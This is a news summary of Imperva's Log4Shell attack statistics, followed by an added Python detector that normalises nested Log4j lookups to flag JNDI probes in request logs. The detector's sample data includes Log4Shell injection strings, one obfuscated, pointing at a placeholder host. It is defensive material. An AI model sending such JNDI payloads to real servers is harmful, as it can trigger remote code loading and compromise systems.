Log4Shell zero-day vulnerability most significant security threat of past decade
The Log4Shell zero-day vulnerability is truly one of the most significant security threats of the past decade, and its effects will be felt far into 2022 and beyond, according to Imperva Research Labs.
Imperva has released its analysis of recent Log4j related vulnerabilities including attack patterns, payloads and bypass techniques.
The company observed more than 102 million exploitation attempts since the disclosure on December 9. In the first 10 days, Imperva observed almost 1.3 million exploit attempts per hour. Since the peak on December 23, there has been a general decline in the number of exploit attempts.
According to the research, the most commonly targeted industries are financial services (29.6%), food and beverages (12.4%) and computing and IT (10.4%). Attackers largely used a "spray and pray" approach to the exploitation of this vulnerability. Imperva says it did not detect a strong correlation between the top sites attacked in each category and their technology stack; however, the correlation becomes more observable when considering only malicious remote code execution (RCE) payloads, which appear to be more targeted.
More than 100 different types of web clients have been targeted. The most prevalent of these clients was the Go HTTP library, with more than 10 million requests and counting. The combination of the volume of the attacks and the distribution of web clients suggests that attacks were quickly automated and that attack tools were created to make it easier for attackers to reach as many targets as possible.
Imperva observed attacks targeting sites in over 160 different countries. The US saw the majority of exploit attempts (46.5%), but Australia is in the top 6 at 3.5%. New Zealand ranked 11th at 1.5%.
Key points from the research include:
Attack Patterns: Attackers largely used a "spray and pray" approach to the exploitation of this vulnerability. Many IPs were using a common technique known as "fuzzing" to identify vulnerable Java web applications.
Payload Analysis: Imperva witnessed many different payloads used in the exploitation of Log4Shell. It has divided the payloads into five categories: Probing, Reverse shells, Malware deployments, Data exfiltration and Patching.
Social Media: When you drop a zero-day vulnerability on social media, it spreads like wildfire, Imperva says. Twitter mentions of key terms relating to the exploit skyrocketed – the company monitored several Log4j-related keywords over the first week of the incident – the term "Log4j" had just two mentions on December 8, followed by a few more on December 9. Then suddenly, there were thousands of mentions starting on December 10.
Future Outlook: Imperva predicts that a tidal wave of breaches will be reported in the next year stemming from this vulnerability and will impact organisations of all sizes. It predicts a sharp increase in ransomware attacks and exploitative crypto mining activity. Botnets will use this vulnerability to expand, hence the volume of application and network DDoS attacks will increase.
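The "Attack Patterns" and "Payload Analysis" points above describe mass automated probing in which a JNDI lookup string is sprayed into request fields and logged by a vulnerable Log4j instance. The following is an added detection example, not code from the Imperva report: it normalises Log4j's documented lookup syntax (`${lower:...}`, `${upper:...}` and the `${key:-default}` fallback form) before checking for a `${jndi:...}` lookup, so that a probe wrapped in nested lookups is not missed by a naive substring match, and it tallies flagged requests by client library in the way the report's per-client figures were derived. The log lines, hostnames and user agents are constructed for the example.

```python
import re
from collections import Counter

# Innermost ${...} lookup (no nested braces inside).
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are looking for after normalisation.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Apply Log4j lookup semantics that an attacker can use to hide 'jndi'.

    Only lookups whose value is fully determined by the string itself are
    resolved; everything else (including jndi) is left in place so it can be
    matched afterwards.
    """
    body = match.group(1)
    key = body.lower()
    if key.startswith("lower:"):
        return body[len("lower:"):].lower()
    if key.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${undefinedKey:-default} evaluates to the default value.
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_jndi_probe(request_text: str) -> bool:
    """True if the request carries a JNDI lookup, obfuscated or not."""
    return JNDI_LOOKUP.search(normalize_lookups(request_text)) is not None


def scan(log_lines):
    """Return (flagged_lines, hits_per_user_agent) for (ip, ua, text) tuples."""
    flagged = [(ip, ua, text) for ip, ua, text in log_lines if is_jndi_probe(text)]
    return flagged, Counter(ua for _, ua, _ in flagged)


# Constructed sample traffic (hostnames and addresses are placeholders).
SAMPLE_LOG = [
    ("203.0.113.5", "Go-http-client/1.1",
     "GET /?q=${jndi:ldap://scanner.invalid/probe} HTTP/1.1"),
    ("203.0.113.6", "Go-http-client/1.1", "GET /login HTTP/1.1"),
    ("198.51.100.9", "curl/7.79.1",
     "GET / HTTP/1.1 X-Api-Version: ${${lower:J}ndi:rmi://scanner.invalid/a}"),
    ("198.51.100.10", "Mozilla/5.0",
     "GET /search?q=${date:yyyy} HTTP/1.1"),  # benign, non-JNDI lookup
]

if __name__ == "__main__":
    hits, by_client = scan(SAMPLE_LOG)
    for ip, ua, text in hits:
        print(f"JNDI probe from {ip} ({ua}): {text}")
    print("hits per client:", dict(by_client))
```

The `${date:yyyy}` line shows the caveat: not every lookup string in a request is an attack, so the rule keys on the `jndi` lookup itself rather than on `${` alone. Logging the matched user agent alongside the source address is what makes the client-library breakdown quoted in the report possible.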